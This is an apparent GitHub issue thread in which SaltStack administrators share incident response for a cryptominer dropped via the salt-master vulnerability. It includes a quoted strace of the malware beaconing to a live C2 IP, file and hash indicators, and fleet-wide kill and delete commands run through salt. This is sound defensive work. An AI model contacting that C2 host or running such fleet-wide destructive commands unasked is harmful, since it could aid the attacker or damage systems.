Closed xiaopanggege closed 4 years ago
You should also assume that any data on the server may have leaked.
I've made backports for the CVE patches, see https://github.com/rossengeorgiev/salt-security-backports. Salt masters should not be accessible via the public internet. Or at the very least should be heavily firewalled.
I’m a little concerned about some of the victim blaming such as “use a firewall” since the official documentation specifically states to open up the firewall for the TCP ports. Sure, experienced admins will know to wall up your garden, but novice admins do not have such experiences yet.
FWIW
2406 write(7, "GET /h HTTP/1.1\r\nHost: 185.221.153.85\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36\r\nArch: amd64\r\nCores: 1\r\nMem: 489\r\nOs: linux\r\nOsname: ubuntu\r\nOsversion: 14.04\r\nRoot: false\r\nUuid: 2e10f8e9-aa42-4223-59b1-9c1038862c25\r\nVersion: 30\r\nAccept-Encoding: gzip\r\n\r\n", 341) = 341
salt-store tries to push some metadata about the machine to its C2 server (or some minion of it).
Edit: it also uses some kind of JSON-RPC to send keepalives.
/var/cache/salt/master/jobs# ls -ltrR
Will show which minions it connected to. This will be useful for cleanup.
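If you prefer a flat list of minion IDs over reading the raw ls output, something like this might work. The directory depth (shard/jid-hash/minion) is an assumption about the default local job cache layout, so verify it against your own tree with `ls -R` first:

```shell
# List unique minion IDs appearing in the master's local job cache.
# NOTE: the 3-level depth is an assumption about the default layout --
# check it against your own /var/cache/salt/master/jobs before relying on it.
list_cached_minions() {
    jobs_dir="${1:-/var/cache/salt/master/jobs}"
    find "$jobs_dir" -mindepth 3 -maxdepth 3 -type d 2>/dev/null \
        | awk -F/ '{print $NF}' | sort -u
}
```

Cross-check the result against `salt-key -L` to spot minions the attacker reached.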
Updated salt-master, but miner jobs are still spawning on minions even after killing/deleting them. Any hint?
There is likely some sort of persistence established. The best course is to restore a backup from before the breach, or rebuild the server. If that's not possible, shut down the salt-minion and try to find what is relaunching the miners:
- Use iftop to identify the C2 server IP, then apply a firewall rule to block traffic to/from that IP.
- Check /var/spool/cron and /etc/cron.{d,daily,weekly,monthly}/
- Check /usr/lib/systemd/system and /etc/systemd/system
- Check /etc/init.d
- Check /root/.bashrc and /root/.bash_profile
- Use grep to search for files containing it across the entire file system.
There are many other possibilities, and you can never be 100% certain you've scrubbed all of the malicious code.
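A rough way to automate the checklist above. This is a sketch only: it assumes you already have a marker string to look for (the binary name, a C2 IP, a wallet address), and the example directory list is just the locations mentioned here, not an exhaustive set:

```shell
# scan_persistence MARKER DIR... : grep the given startup/persistence
# locations for a marker string and print any files that contain it.
scan_persistence() {
    marker="$1"; shift
    for d in "$@"; do
        # -e so single files like /root/.bashrc work as well as directories
        [ -e "$d" ] && grep -rl "$marker" "$d" 2>/dev/null
    done
    return 0
}

# Example invocation over the locations from the checklist:
# scan_persistence salt-store \
#     /var/spool/cron /etc/cron.d /etc/cron.daily /etc/cron.weekly \
#     /etc/cron.monthly /usr/lib/systemd/system /etc/systemd/system \
#     /etc/init.d /root/.bashrc /root/.bash_profile
```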
Switching to salt-ssh and removing salt-master and salt-minions also helps greatly :)
FYI, after disabling the minion service and rebooting, no more miners spawned. On my side, nothing is left after a reboot (as long as the minion stays disabled, of course). I'll re-enable the service on a test machine and see if the patched master solved it.
It's not proof, but rather a heuristic: I diffed the filesystem (including the bootloader) of my sandbox VM before and after I ran salt-store, and I haven't found any persistence mechanism.
This is the complete list of modified files by the malware:
/run/lock/linux.lock
/tmp/.ICEd-unix
/tmp/.ICEd-unix/346542842
/tmp/.ICEd-unix/uuid
/tmp/salt-minions
/var/tmp/.ICEd-unix
Probably noteworthy: I killed / restarted the process itself and its subprocesses to see if the binary behaves differently. However, salt-store always just restarted its miner child process.
Still, they may use VM detection and run different code branches in different environments. The sysctl patch was done by the sa.sh bootstrap script, so it's not listed here. Since sa.sh can be seen as source code in this thread, I only focused on analyzing salt-store. I haven't seen any persistence mechanisms in sa.sh either.
I would still double check everything, if rebuild or backup restore is not possible, as this miner may not be the only attack.
/var/cache/salt/master/jobs# ls -ltrR
Will show which minions it connected to. This will be useful for cleanup.
I did a grep -r confluence . on this directory to check which clients executed the sa.sh script (this may be a false positive on Confluence servers, but not all servers run Confluence, I guess). For active salt-minions I'd run salt-key -L.
If your master is not a minion as well, the master itself is not compromised by this vulnerability. Additionally, all commands executed on minions are still logged on the master by default, so it should be possible to track all actions made via the salt vulnerability itself. This obviously excludes modifications by any programs salt has side-loaded onto the machine, which most likely run under root privileges (like sa.sh / salt-minion).
I've been digging through the salt-miner-snoopy-log.txt that was posted above:
Elements in that log file & loader script found elsewhere that may provide some additional insight into the underlying behavior: https://tolisec.com/yarn-botnet/ https://zero.bs/how-an-botnet-infected-confluence-server-looks-like.html https://xn--blgg-hra.no/2017/04/covert-channels-hiding-shell-scripts-in-png-files/ https://gist.github.com/OmarTrigui/8ba857c6a9a91724a7eb0cfdd040f50d https://s.tencent.com/research/report/975.html
Updated salt-master, but miner jobs are still spawning on minions even after killing/deleting them. Any hint?
Don't forget to restart the salt master as well.
For some reason, in one of my instances killing all salt-minions & salt-store processes as well as deleting those files doesn't seem to be working. The salt-minions process starts within about 2 minutes of killing and deleting them. Checked cron, init, systemd, bashrc, rc.local; nothing found. Still digging around, will update if anything worthy is found.
This is something I was worried about. The salt-store binary is capable of self-updating. It's possible there is additional persistence behavior now that wasn't there last night even. Can you md5 your binary?
Update: confirmed! The bitbucket repo force-pushed a new binary to the repo. It's now called "salt-storer" instead of salt-store. This was done 3 hours ago.
I ran the below on each of the servers as suggested above and then rebooted each box. (About 240 of them!) I am not seeing any more spawning after this.
kill -9 $(pgrep salt-minions)
kill -9 $(pgrep salt-store)
rm -f /tmp/salt-minions
rm -f /var/tmp/salt-store
sed -i '/kernel.nmi_watchdog/d' /etc/sysctl.conf
systemctl restart firewalld || /etc/init.d/iptables restart
Before I did that, I turned off my salt-master. What is the safest way to turn the master back on and patch it? It is a VPS that has internet connectivity. What is the best procedure to patch the master?
Update 1 on my earlier comment (killing all salt-minions & salt-store processes and deleting those files isn't working; the salt-minions process restarts within about 2 minutes):
Not much but this:
root@myserver:/tmp/.ICEd-unix/bak# cat 328909204 && echo
25391
root@myserver:/tmp/.ICEd-unix/bak# ps ax | grep 25391
25391 ? Ssl 4:51 /tmp/salt-minions
25759 pts/5 S+ 0:00 grep 25391
root@myserver:/tmp/.ICEd-unix/bak#
So what's happening here is that if I kill the salt-minions process, after about 2 minutes a file gets written inside the .ICEd-unix folder. The content of that file is a number, which is the PID of the parent salt-minions, and that file gets deleted as soon as the salt-minions process starts. I had to loop cp to get that file copied from the .ICEd-unix folder to .ICEd-unix/bak, so please ignore that bak/.
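For anyone else trying to grab those short-lived drop-files, the "loop cp" can be scripted like this. A sketch only: the iteration cap and poll interval are arbitrary choices, and a fast-enough writer could still slip between polls:

```shell
# snapshot_dir SRC DST [N] : repeatedly copy new files out of SRC into
# DST so short-lived files (like the PID drop-file) are preserved.
# N bounds the number of polls; 0 (the default) loops until interrupted.
snapshot_dir() {
    src="$1"; dst="$2"; n="${3:-0}"; i=0
    mkdir -p "$dst"
    while :; do
        cp -n "$src"/* "$dst"/ 2>/dev/null   # -n: never overwrite a snapshot
        i=$((i + 1))
        [ "$n" -gt 0 ] && [ "$i" -ge "$n" ] && break
        sleep 0.2
    done
    return 0
}

# Usage: snapshot_dir /tmp/.ICEd-unix /root/ice-bak
```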
Did you update and restart your salt-master? Could it be kicking it off again?
Updates to the malware continue to go out. This thread may now contain outdated hints and help.
Oh yes. It's happening after updating and restarting salt-master.
salt 3000.2
root@00:/var/cache/salt# systemctl status salt-master
● salt-master.service - The Salt Master Server
Loaded: loaded (/lib/systemd/system/salt-master.service; enabled; vendor preset: enabled)
Active: active (running) since Sun 2020-05-03 21:10:31 +0545; 1h 11min ago
Docs: man:salt-master(1)
file:///usr/share/doc/salt/html/contents.html
https://docs.saltstack.com/en/latest/contents.html
Main PID: 19783 (salt-master)
Tasks: 34 (limit: 4915)
Memory: 279.8M
CGroup: /system.slice/salt-master.service
├─19783 /usr/bin/python3 /usr/bin/salt-master
------ truncated -----------
May 03 21:10:31 00 systemd[1]: Stopped The Salt Master Server.
May 03 21:10:31 00 systemd[1]: Starting The Salt Master Server...
May 03 21:10:31 00 systemd[1]: Started The Salt Master Server.
And it's happening even after I have salt-master stopped. Tested just now, double checked by stopping salt-master.
@Avasz Can you tree your processes and see what the parent process is? And what's the md5sum of your salt-store binary? I can run it in a container and see what other files it might touch.
@taigrr Parent process: /sbin/init :open_mouth: I don't have /var/tmp/salt-store binary anymore..
@Avasz this thing has morphed quite a bit. I'm starting to think a GitHub issue isn't the best way to troubleshoot anymore.
I have both binaries:
md5sum /tmp/salt-minions
a28ded80d7ab5c69d6ccde4602eef861  /tmp/salt-minions
md5sum /var/tmp/salt-store
8ec3385e20d6d9a88bc95831783beaeb  /var/tmp/salt-store
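To sweep a fleet for these exact samples, one could compare against the sums above. A sketch only, and since the binary self-updates, a differing hash proves nothing; only a match is meaningful:

```shell
# check_hash FILE MD5 : report whether FILE matches a known-bad MD5 sum.
check_hash() {
    f="$1"; bad="$2"
    [ -f "$f" ] || { echo "absent: $f"; return 0; }
    sum=$(md5sum "$f" | cut -d' ' -f1)
    if [ "$sum" = "$bad" ]; then
        echo "MATCH: $f"
    else
        echo "differs: $f ($sum)"   # could be a newer self-updated build
    fi
}

# The two samples posted above:
check_hash /tmp/salt-minions   a28ded80d7ab5c69d6ccde4602eef861
check_hash /var/tmp/salt-store 8ec3385e20d6d9a88bc95831783beaeb
```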
I was also seeing just one of my machines established a persistence for salt-minions without salt-store(r).
I wrote a quick bash while-lsof to catch it, and a randomly-named process was writing out the file.
I just rebooted that machine. If it re-establishes, I'm going to write a quick script to send a SIGSTOP (and/or hook gdb) when lsof picks it up again.
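A variant of that idea which avoids lsof: poll for the drop-file, then resolve the PID it contains through /proc. A sketch under assumptions: the poll count and interval are arbitrary, and /proc/&lt;pid&gt;/comm is Linux-specific:

```shell
# catch_writer FILE [TRIES] : wait for FILE to appear, read the PID it
# contains, and print that process's name from /proc/<pid>/comm.
catch_writer() {
    f="$1"; tries="${2:-50}"
    while [ "$tries" -gt 0 ]; do
        if [ -f "$f" ]; then
            pid=$(cat "$f")
            [ -r "/proc/$pid/comm" ] && cat "/proc/$pid/comm" && return 0
        fi
        tries=$((tries - 1))
        sleep 0.1
    done
    return 1
}

# Usage: catch_writer /tmp/.ICEd-unix/328909204
# From there, `kill -STOP $pid` or `gdb -p $pid` instead of kill -9.
```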
@astronouth7303 What is the name of that random process? Is it "vXrSv"?
It is always that and salt-minions in my case.
salt-mini 4692 root 1u REG 8,1 4 667325 104066568
vXrSv 7619 root 6u REG 8,1 4 667325 104066568
@taigrr yeah.. this issue doesn't seem to be a good place to discuss anymore. Any other alternative communication channel? Telegram? Slack? :)
@astronouth7303 What is the name of that random process? Is it "vXrSv"? It is always that and salt-minions in my case.
Nope, mine was XrqMv
It doesn't seem to be coming back after reboot.
SaltStack has a slack, which seems like the obvious choice?
Just rebooted and it stopped coming back.
Anybody want to join the slack, https://saltstackcommunity.herokuapp.com/ I've created a dedicated channel (salt-store-miner-public). Send username to be added.
@Avasz Be careful. I don't believe it's gone.
@taigrr Would like to join the conversation.
This whole "don't have your salt master exposed to the internet" thing has me annoyed. The whole point of salt is to manage boxes all over the place. I manage around 500 machines. Most of them are behind the firewalls of incompetent admins who have spent hours in the past trying to set up port forwards when salt-minion crashed so I could access the box again. I'm about to test binding salt-master to localhost and salt-minion to localhost and then setting up spiped to wrap the traffic...
Anybody want to join the slack, https://saltstackcommunity.herokuapp.com/invite I've created a dedicated channel (salt-store-miner). Send username to be added.
@Avasz Be careful. I don't believe it's gone.
i would like to be added
I'd also be happy to be invited, thanks.
Me too please
Me too please
Username on slack? Can't find you, @nbuchwitz
Guys, please give me your slack names. You must already be a part of the slack group I posted the link above. Having trouble finding some of you. You can also dm me through slack (Tai Groot) to prevent from cluttering this issue.
I used these commands to remove the binaries and stop the processes on all hosts. The second one is from @opiumfor, above.
salt -v '*' cmd.run 'rm /var/tmp/salt-store && rm /tmp/salt-minions'
salt -v '*' cmd.run 'ps aux | grep -e "/var/tmp/salt-store\|salt-minions" | grep -v grep | tr -s " " | cut -d " " -f 2 | xargs kill -9'
This whole "don't have your salt master exposed to the internet" thing has me annoyed. The whole point of salt is to manage boxes all over the place. I manage around 500 machines. Most of them are behind the firewalls of incompetent admins who have spent hours in the past trying to set up port forwards when salt-minion crashed so I could access the box again.
I do agree with this. I also have a similar use case. 1000+ devices all in various places, various networks. VPN & controlled access to port 4505 & 4506 not possible at all. Salt was the perfect tool .
Very quick and dirty howto to wrap salt traffic in spiped for encryption: https://gist.github.com/darkpixel/51930435c27724d2b41daa8c6bded673
I'm going to work on a few salt states to automatically push these changes out to my minions and I will publish those as well.
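For reference, the spiped wrapping can be sketched roughly like this. The ports 8505/8506, the key path, and master.example.com are illustrative assumptions of mine, not taken from the gist; see the gist for the full howto:

```shell
# One 32-byte key, shared between the master and all minions:
dd if=/dev/urandom of=/etc/spiped/salt.key bs=32 count=1

# On the master (salt-master bound to 127.0.0.1): decrypt incoming
# connections onto the local publish (4505) and request (4506) ports.
spiped -d -s '[0.0.0.0]:8505' -t '[127.0.0.1]:4505' -k /etc/spiped/salt.key
spiped -d -s '[0.0.0.0]:8506' -t '[127.0.0.1]:4506' -k /etc/spiped/salt.key

# On each minion (with `master: 127.0.0.1` in /etc/salt/minion):
# encrypt local connections out to the real master.
spiped -e -s '[127.0.0.1]:4505' -t 'master.example.com:8505' -k /etc/spiped/salt.key
spiped -e -s '[127.0.0.1]:4506' -t 'master.example.com:8506' -k /etc/spiped/salt.key
```

Anyone without the shared key then sees only closed-looking encrypted pipes, not the salt ports.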
@taigrr I would like to be added to slack as well. Thanks! user: int-adam
A small hint for those with "recurring" malware issues: if you installed saltstack from your distribution repositories, the master may still be vulnerable. Right now there are no fixed versions in any official Ubuntu or Debian repositories, and EPEL (there is no saltstack package in CentOS directly) was last updated in 2016.
Personally, I'd just shut off the salt-master, wait for a fixed version, and put it back online afterwards, if that is a feasible solution.
@adamf-int don't see you. Found everybody else so far. Did you use the heroku signup link?
When I click the link, it says not found.
Updated link. Try again.
I couldn't access this link either. What's the correct Slack signup link?
OK the link worked this time.
Hi there. This one got me too. When I try to access https://saltstackcommunity.herokuapp.com/invite it says 'Not Found'. Would really appreciate some help recovering from this issue...
Description: All my servers with salt-minion installed suddenly started running an unknown program today: /tmp/salt-minions.
[root@yunwei ~]# top
top - 10:06:44 up 511 days, 18:39,  3 users,  load average: 2.01, 2.02, 1.91
Tasks: 193 total,   1 running, 192 sleeping,   0 stopped,   0 zombie
Cpu(s):  7.2%us, 18.3%sy,  0.0%ni, 74.1%id,  0.4%wa,  0.0%hi,  0.0%si,  0.0%st
Mem:   8060948k total,  7502768k used,   558180k free,    76316k buffers
Swap:  4194300k total,   437368k used,  3756932k free,   188012k cached
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
2280 root 20 0 56.0g 541m 1588 S 101.1 6.9 345886:48 tp_core
27061 root 20 0 2797m 1848 1000 S 99.1 0.0 36:02.75 salt-minions
[root@yunwei ~]# ps -ef | grep 27061 | grep -v grep
root     27061     1 89 09:26 ?        00:36:37 /tmp/salt-minions
salt-minion version: 2018.3.2, system: CentOS release 6.5 (Final)